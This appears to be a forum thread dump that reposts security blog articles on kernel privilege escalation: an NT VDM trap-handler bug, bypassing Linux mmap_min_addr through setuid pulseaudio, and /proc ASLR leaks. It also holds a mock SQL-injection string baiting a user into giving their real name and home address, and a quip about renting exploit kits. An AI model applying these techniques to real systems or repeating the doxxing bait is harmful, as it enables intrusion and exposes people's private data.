Markus Gutschke, Adam Langley (and others who made Chrome sandboxable under the setuid sandbox in the first place) and of course, for the actual kernel support, Will Drewry and Kees Cook. We will continue to work on improving and tightening this new sandbox, this is just a start. Please give it a try, and report any bugs to crbug.com (feel free to cc: jln at chromium.org directly). PS: to make sure that you have kernel support for seccomp BPF, use Linux 3.5 or Ubuntu 12.04. Check about:sandbox in Chrome 22+ and see if Seccomp-BPF is enabled). Also make sure you're using the 64 bits version of Chrome. Posted by Julien Tinnes at 5:21 PM Sursa: cr0 blog: Introducing Chrome's next-generation Linux sandbox
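To check whether your own kernel can support this sandbox, a minimal sketch (the config file path varies by distribution):
$ uname -r        # seccomp-BPF needs Linux 3.5+, or a distribution backport such as Ubuntu 12.04
$ grep -E 'CONFIG_SECCOMP(_FILTER)?=' /boot/config-$(uname -r)
# On kernels built with the feature you should see CONFIG_SECCOMP=y and CONFIG_SECCOMP_FILTER=y.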
  6. [h=3]CVE-2010-0232: Microsoft Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack[/h]Thursday, January 21, 2010 Two days ago, Tavis Ormandy has published one of the most interesting vulnerabilities I've seen so far. It's one of those rare, but fascinating design-level errors dealing with low-level system internals. Its exploitation requires skills and ingenuity. The vulnerability lies in Windows' support for Intel's hardware 8086 emulation support (virtual-8086, or VM86) and is believed to have been there since Windows NT 3.1 (1993!), making it 17 years old. It uses two tricks that we have already published on this blog before, the #GP on pre-commit handling failure and the forging of cs:eip in VM86 mode. This was intended to be mentioned in our talk at PacSec about virtualization this past November, but Tavis had agreed with Microsoft to postpone the release of this advisory. Tavis was kind enough to write a blog post about it, you can read it below: From Tavis Ormandy: I've just published one of the most interesting bugs I've ever encountered, a simple authentication check in Windows NT that can incorrectly let users take control of the system. The bug exists in code hidden deep enough inside the kernel that it's gone unnoticed for as long as NT has existed. If you've ever tried to run an MS-DOS or Win16 application on a modern NT machine, the chances are it worked. This is an impressive feat, these applications were written for a completely different execution environment and operating system, and yet still work today and run at almost native speed. The secret that makes this possible behind the scenes is Virtual-8086 mode. Virtual-8086 mode is a hardware emulation facility built into all x86 processors since the i386, and allows modern operating systems to run 16-bit programs designed for real mode with very little overhead. These 16-bit programs run in a simulated real mode environment within a regular protected mode task, allowing them to co-exist in a modern multitasking environment. Support for Virtual-8086 mode requires a monitor, the collective name for the software that handles any requests the program makes. These requests range from handling sensitive instructions to mapping low-level services onto system calls and are implemented partially in kernel mode and partially in user mode. In Windows NT, the user mode component is called the NTVDM subsystem, and it interacts with the kernel via a native system service called NtVdmControl. NtVdmControl is unusual because it's authenticated, only authorised programs are permitted to access it, which is enforced using a special process flag called VdmAllowed which the kernel verifies is present before NtVdmControl will perform any action; if you don't have this flag, the kernel will always return STATUS_ACCESS_DENIED. The bug we're talking about today involves how BIOS service calls are handled, which are a low level way of interacting with the system that's needed to support real-mode programs. The kernel implements BIOS service calls in two stages, the second stage begins when the interrupt handler for general protection faults (often shortened to #GP in technical documents) detects that the system has completed the first stage. 
The details of how BIOS service calls are implemented are unimportant, what is important is that the two stages must be perfectly synchronised, if the kernel transitions to the second stage incorrectly, a hostile user can take advantage of this confusion to take control of the kernel and compromise the system. In theory, this shouldn't be a problem, Microsoft implemented a check that verifies that the trap occurred at a magic address (actually, a cs:eip pair) that unprivileged users can't reach. The check seems reasonable at first, the hardware guarantees that unprivileged code can't arbitrarily make itself more privileged without a special request, and even if it could, only authorised programs are permitted to use NtVdmControl() anyway. Unfortunately, it turns out these assumptions were wrong. The problem I noticed was that although unprivileged code cannot make itself more privileged arbitrarily, Virtual-8086 mode makes testing the privilege level of code more difficult because the segment registers lose their special meaning. This is because In protected mode, the segment registers (particularly ss and cs) can be used to test privilege level, however in Virtual-8086 mode they're used to create far pointers, which allow 16-bit programs to access the 20-bit real address space. However, I still couldn't abuse this fact because NtVdmControl() can only be accessed by authorised programs, and there's no other way to request pathological operation on Virtual-8086 mode tasks. I was able to solve this problem by invoking the real NTVDM subsystem, and then loading my own code inside it using a combination of CreateRemoteThread(), VirtualAllocEx() and WriteProcessMemory(). Finally, I needed to find a way to force the kernel to transition to the vulnerable code while my process appeared to be privileged. My solution to this was to make the kernel fault when returning to user mode from kernel mode, thus creating the appearance of a legitimate trap for the fabricated execution context that I had installed. These steps all fit together perfectly, and can be used to convince the kernel to execute my code, giving me complete control of the system. Conclusion Could Microsoft have avoided this issue? It's difficult to imagine how, errors like this will generally elude fuzz testing (In order to observe any problem, a fuzzer would need to guess a 46-bit magic number, as well as setup an intricate process state, not to mention the VdmAllowed flag), and any static analysis would need an incredibly accurate model of the Intel architecture. The code itself was probably resistant to manual audit, it's remained fairly static throughout the history of NT, and is likely considered forgotten lore even inside Microsoft. In cases like this, security researchers are sometimes in a better position than those with the benefit of documentation and source code, all abstraction is stripped away and we can study what remains without being tainted by how documentation claims something is supposed to work. If you want to mitigate future problems like this, reducing attack surface is always the key to security. In this particular case, you can use group policy to disable support for Application Compatibility (see the Application Compatability policy template) which will prevent unprivileged users from accessing NtVdmControl(), certainly a wise move if your users don't need MS-DOS or Windows 3.1 applications. 
Posted by Julien Tinnes at 7:48 AM Sursa: cr0 blog: CVE-2010-0232: Microsoft Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack
  7. [h=3]Bypassing Linux' NULL pointer dereference exploit prevention (mmap_min_addr)[/h]Friday, June 26, 2009 EDIT3: Slashdot, the SANS Institute, Threatpost and others have a story about an exploit by Bradley Spengler which uses our technique to exploit a null pointer dereference in the Linux kernel. EDIT2: As of July 13th 2009, the Linux kernel integrates our patch (2.6.31-rc3). Our patch also made it into -stable. EDIT1: This is now referenced as a vulnerability and tracked as CVE-2009-1895 NULL pointer dereferences are a common security issue in the Linux kernel. In the realm of userland applications, exploiting them usually requires being able to somehow control the target's allocations until you get page zero mapped, and this can be very hard. In the paradigm of locally exploiting the Linux kernel however, nothing (before Linux 2.6.23) prevented you from mapping page zero with mmap() and crafting it to suit your needs before triggering the bug in your process' context. Since the kernel's data and code segment both have a base of zero, a null pointer dereference would make the kernel access page zero, a page filled with bytes in your control. Easy. This used to not be the case, back in Linux 2.0 when the kernel's data segment's base was above PAGE_OFFSET and the kernel had to explicitly use a segment override (with the fs selector) to access data in userland. The same rough idea is now used in PaX/GRSecurity's UDEREF to prevent exploitation of "unexpected to userland kernel accesses" (it actually makes use of an expand down segment instead of a PAGE_OFFSET segment base, but that's a detail). Kernel developers tried to solve this issue too, but without resorting to segmentation (which is considered deprecated and is mostly not available on x86_64) and in a portable (cross architectures) way. In 2.6.23, they introduced a new sysctl, called vm.mmap_min_addr, that defines the minimum address that you can request a mapping at. Of course, this doesn't solve the complete issue of "to userland pointer dereferences" and it also breaks the somewhat useful feature of being able to map the first pages (this breaks Dosemu for instance), but in practice this has been effective enough to make exploitation of many vulnerabilities harder or impossible. Recently, Tavis Ormandy and myself had to exploit such a condition in the Linux kernel. We investigated a few ideas, such as: using brk() creating a MAP_GROWSDOWN mapping just above the forbidden region (usually 64K) and segfaulting the last page of the forbidden region obscure system calls such as remap_file_pages putting memory pressure in the address space to let the kernel allocate in this region using the MAP_PAGE_ZERO personality All of them without any luck at first. The LSM hook responsible for this security check was correctly called every time. So what does the default security module do in cap_file_mmap? This is the relevant code (in security/capability.c on recent versions of the Linux kernel): if ((addr < mmap_min_addr) && !capable(CAP_SYS_RAWIO)) return -EACCES; return 0; Meaning that a process with CAP_SYS_RAWIO can bypass this check. How can we get our process to have this capability? By executing a setuid binary of course! So we set the MMAP_PAGE_ZERO personality and execute a setuid binary. Page zero will get mapped, but the setuid binary is executing and we don't have control anymore. So, how do we get control back?
Using something such as "/bin/su our_user_name" could be tempting, but while this would indeed give us control back, su will drop privileges before giving us control back (it'd be a vulnerability otherwise!), so the Linux kernel will make exec fail in the cap_file_mmap check (due to the MMAP_PAGE_ZERO personality). So what we need is a setuid binary that will give us control back without going through exec. We found such a setuid binary that is installed on many Desktop Linux machines by default: pulseaudio. pulseaudio will drop privileges and let you specify a library to load through its -L argument. Exactly what we needed! Once we have one page mapped in the forbidden area, it's game over. Nothing will prevent us from using mremap to grow the area and mprotect to change our access rights to PROT_READ|PROT_WRITE|PROT_EXEC. So this completely bypasses the Linux kernel's protection. Note that apart from this problem, the mere fact that MMAP_PAGE_ZERO is not in the PER_CLEAR_ON_SETID mask and thus is allowed when executing setuid binaries can be a security issue: being able to map page zero in a process with euid=0, even without controlling its content could be useful when exploiting a null pointer vulnerability in a setuid application. We believe that the correct fix for this issue is to add MMAP_PAGE_ZERO to the PER_CLEAR_ON_SETID mask. PS: Thanks to Robert Swiecki for some help while investigating this. Posted by Julien Tinnes at 11:37 AM Sursa: cr0 blog: Bypassing Linux' NULL pointer dereference exploit prevention (mmap_min_addr)
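If you want to see how this knob is set on a given machine, a small sketch (the value is in bytes; a common default on modern desktop distributions is 65536, i.e. the low 64K cannot be mapped):
$ cat /proc/sys/vm/mmap_min_addr
$ sysctl vm.mmap_min_addr
# To raise it (as root), for example:
# sysctl -w vm.mmap_min_addr=65536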
  8. [h=3]Local bypass of Linux ASLR through /proc information leaks[/h]Wednesday, April 22, 2009 EDIT2: Thanks to the efforts of Jake Edge who noticed our presentation, /proc/pid/stat information leak is now at least partially patched in mainline kernel, since 2.6.27.23 EDIT1: This is featured in an LWN article by Jake Edge Tavis Ormandy and myself talked about locally bypassing address space layout randomization (ASLR) in Linux in a lightning talk at CanSecWest. From Linux 2.6.12 to Linux 2.6.21, you could completely bypass ASLR when targeting local processes by reading /proc/pid/maps. Since Linux 2.6.22, if you cannot ptrace "pid", then you will see an empty /proc/pid/maps. It has been known for at least 7 years now that /proc/pid/stat and /proc/pid/wchan could also leak sensitive information. Reading this information has been prevented in GRSecurity since the beginning as well as in this patch. The question was: could you exploit this information to bypass ASLR in practice? If you want to find out, it's easy: we've just published the slides and Tavis' tool! Posted by Julien Tinnes at 4:21 PM Sursa: cr0 blog: Local bypass of Linux ASLR through /proc information leaks
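To see the kind of leak being discussed, a quick sketch (the pid 1234 is only a placeholder; per proc(5), fields 26-28 of /proc/<pid>/stat are startcode, endcode and startstack):
$ head -3 /proc/self/maps    # your own mappings, re-randomized on each exec
$ cat /proc/1234/stat        # world-readable even for other users' processes on unpatched kernels
On kernels with the fix mentioned above, those address fields should read as 0 unless you are allowed to ptrace the target process.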
  9. [h=3]History of memory corruption vulnerabilities and exploits[/h] I came across a great paper, “Memory Errors: The Past, the Present, and the Future” by van der Veen et al. The authors cover the history of memory corruption errors as well as exploitation and countermeasures. I think there are a number of interesting conclusions to draw from it. It seems that the number of flaws in common software is still much too high. Consider what’s required to compromise today’s most hardened consumer platforms, iOS and Chrome. You need a flaw in the default install that is useful and remotely accessible, a memory disclosure bug, a sandbox bypass (or multiple ones), and often a kernel or other privilege escalation flaw. Given a sufficiently small trusted computing base, it should be impossible to find this confluence of flaws. We clearly have too large a TCB today since this combination of flaws has been found not once, but multiple times in these hardened products. Other products that haven’t been hardened require even fewer flaws to compromise, making them more vulnerable even if they have the same rate of bug occurrence. The paper’s conclusion shows that if you want to prevent exploitation, your priority should be preventing stack, heap, and integer overflows (in that order). Stack overflows are by far still the most commonly exploited class of memory corruption flaws, out of proportion to their prevalence. We’re clearly not smart enough as a species to stop creating software bugs. It takes a Dan Bernstein to reason accurately about software in bite-sized chunks such as in qmail. It’s important to face this fact and make fundamental changes to process and architecture that will make the next 18 years better than the last. Download: http://www.isg.rhul.ac.uk/sullivan/pubs/raid-2012.pdf Sursa: History of memory corruption vulnerabilities and exploits | root labs rdist
  10. I found a "bridge" between Wordpress and vBulletin, but it doesn't work on this version. More precisely, it crashes the whole blog. I'll try to do something "manual" for the comments, but I don't know when. For now we'll leave it as it is and see how it turns out.
  11. Nytro

    question

    ' or username=NUMELE_TAU_REAL/**/and/**/aDDreSS=ADRESA_TA_DE_ACASA Replace the parts in capitals with your real data.
  12. 1. 6 (1 + 2 + 3) 2. RSTRSTRSTRST (when b reaches 0) 3. Hello world (compatibility format for "old", i.e. ancient, keyboards) 4. You don't have "using namespace std;". Invalid lvalue... ? 5. RST 6. It's 4 in the morning! And here I am doing a challenge on RST 7. 9 (2 + 3 + 4) 8. exit(0), RST (it no longer compiles, so it no longer prints anything) Plm
  13. Yes, that's the page we would need, a design for it.
  14. Speaking of history, there are very few people I know who have been active for at least 5-6 years. While we're at it, is anyone willing to make a homepage? We only need the design; I'll take care of the integration.
  15. Yes, I've thought about that. When I have some free time I'll write a more detailed article; I just hope I'll have the time...
  16. Hello, To complement the forum we have decided to open a blog: https://rstforums.com/blog/ The blog has a purely informative role: it will contain administrative announcements, small articles in Romanian and much more. More information: https://rstforums.com/blog/2013/03/23/blog-ul-rst/ Only staff members will post on the blog. If you have something nice that you think could be posted, get in touch with someone from the staff. If there are any problems or if you have suggestions, we gladly await them here. // RST
  17. Nytro

    Hello

    Goodbye.
  18. Don't take the risk, there are a lot of scammers. I haven't tried it and I never will, but those are the losers who used to copy other people's exploits and claim they were their own: injector. If you want exploits it's simple: rent an exploit kit! And let me know if you do that
  19. When you call another network you hear a "beep" that lets you know that "you may be charged extra".
  20. www.youtube.com/watch?v=Z1eX1vEgiRQ
  21. Info: Call 544 and find out whether your phone is tapped: Can the Intelligence officers be caught "in the act"? Who authorizes their wiretaps
  22. Yes, I think it was a game, I think it was from Steam. I mean, I don't know if it actually had anything to do with OpenGL; I think it wasn't OpenGL they had optimized but that game...
  23. "Permanent" link (source code): https://rstforums.com/proiecte/DK_v3.3.zip I will do the same for as many projects as possible.
  24. [h=1]Windows 8 Outperforming Ubuntu Linux With Intel OpenGL Graphics[/h] Published on March 21, 2013 Written by Michael Larabel In our benchmarks of Microsoft Windows 8, we have found that Intel's Windows OpenGL driver is generally superior to that of their open-source Linux graphics driver. Some progress has been made, but in today's testing of an ASUS Ultrabook bearing an Ivy Bridge processor, Linux has a ways to go for some games in matching the Windows binary performance and features. Over the years there have been many Windows 7 vs. Linux benchmarks on Phoronix. Having recently picked up an ASUS Ultrabook for benchmarking, some Windows 8 vs. Ubuntu 13.04 development benchmarks were carried out to see the positioning today. An ASUS S56CA-WH31 was the candidate for this testing, which is a $500 Intel Ultrabook sporting an Intel Core i3 3217U CPU, 4GB of DDR3 system memory, 500GB 5400RPM HDD + 24GB Solid-State Drive, and a 15.6-inch display with 1366 x 768 resolution. The ASUS Ultrabook comes pre-loaded with Microsoft Windows 8. The Intel Core i3 3217U processor provides HD 4000 graphics, two physical cores plus Hyper Threading, 1.8GHz clock frequency, 3MB cache, and is rated at a 17 Watt TDP. All benchmarking in this article between Windows and Linux happened from this ASUS S56CA-WH31 Ultrabook. The stock Intel Windows 8 graphics performance was compared to Ubuntu 13.04 in a variety of cross-platform games using OpenGL where the games are known to have quality/similar ports to Windows and Linux. Benchmarking on both operating systems were all handled via the open-source Phoronix Test Suite software in conjunction with OpenBenchmarking.org. The Ubuntu 13.04 development snapshot used was from mid-March and packaged the Linux 3.8 kernel, Unity 6.6.0, xf86-video-intel 2.21.4, X.Org Server 1.13.2, GCC 4.7.2, and Mesa 9.0.2. For also seeing the very latest state of the Intel OpenGL driver software on Linux, Ubuntu 13.04 was additionally tested when using a Git development snapshot of the Linux 3.9 kernel and then Mesa 9.2-devel Git master from mid-March. This represents the very latest state of the Intel Linux graphics driver. (Ubuntu 13.04 will ship with Mesa 9.1, but that stable release wasn't pulled into the repository at the time of testing and 9.2-devel offers the absolute latest innovations for this open-source driver.) Previous to this article, my latest Windows 7 test articles were: Intel Linux OpenGL Driver Remains Slower Than Windows, NVIDIA Performance: Windows 7 vs. Ubuntu Linux 12.10, and AMD Radeon Catalyst: Windows 7 vs. Ubuntu 12.04 LTS. This testing is quite straightforward and looking namely at the "out of the box" OpenGL gaming performance between Windows 8 and Ubuntu 13.04 for Intel Ivy Bridge graphics. Articol complet: [Phoronix] Windows 8 Outperforming Ubuntu Linux With Intel OpenGL Graphics
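For anyone who wants to reproduce this kind of comparison, a rough sketch of driving the Phoronix Test Suite from the command line; the test profile named here (nexuiz) is only an example and may differ from the ones used in the article:
$ sudo apt-get install phoronix-test-suite
$ phoronix-test-suite list-available-tests
$ phoronix-test-suite benchmark nexuiz    # installs the test, runs it, and offers an OpenBenchmarking.org upload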